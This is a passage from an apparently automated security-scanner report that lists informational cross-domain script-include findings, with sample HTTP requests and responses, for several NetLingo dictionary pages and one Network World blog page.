http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/technical.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1202. http://www.netlingo.com/word/53x.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/53x.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/53x.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1203. http://www.netlingo.com/word/aor.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/aor.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/aor.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1204. http://www.netlingo.com/word/buff.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/buff.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/buff.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1205. http://www.netlingo.com/word/cu46.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/cu46.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/cu46.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1206. http://www.netlingo.com/word/dead-cell-phones.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/dead-cell-phones.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/dead-cell-phones.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1207. http://www.netlingo.com/word/dead-computers.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/dead-computers.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/dead-computers.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1208. http://www.netlingo.com/word/digitally-grounded.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/digitally-grounded.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/digitally-grounded.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1209. http://www.netlingo.com/word/do-not-track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/do-not-track.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/do-not-track.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1210. http://www.netlingo.com/word/elancers.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/elancers.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/elancers.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1211. http://www.netlingo.com/word/fingerprint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/fingerprint.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/fingerprint.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1212. http://www.netlingo.com/word/gadget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/gadget.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/gadget.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1213. http://www.netlingo.com/word/gizmo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/gizmo.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/gizmo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1214. http://www.netlingo.com/word/lm4azzzz.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/lm4azzzz.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/lm4azzzz.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1215. http://www.netlingo.com/word/mih.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/mih.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/mih.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1216. http://www.netlingo.com/word/next-generation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/next-generation.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/next-generation.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1217. http://www.netlingo.com/word/online-jargon.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/online-jargon.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/online-jargon.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1218. http://www.netlingo.com/word/ru18-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/ru18-2.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/ru18-2.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1219. http://www.netlingo.com/word/wtg4a.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word/wtg4a.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/wtg4a.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1220. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/idge.nww.subnet_opensource/;pos=lb2;sz=195x90;tile=2;ord=120353?
http://admin.brightcove.com/js/experience_util.js
http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse
http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL
http://content.dl-rms.com/rms/mother/575/nodetag.js
http://d.yimg.com/ds/badge2.js
http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
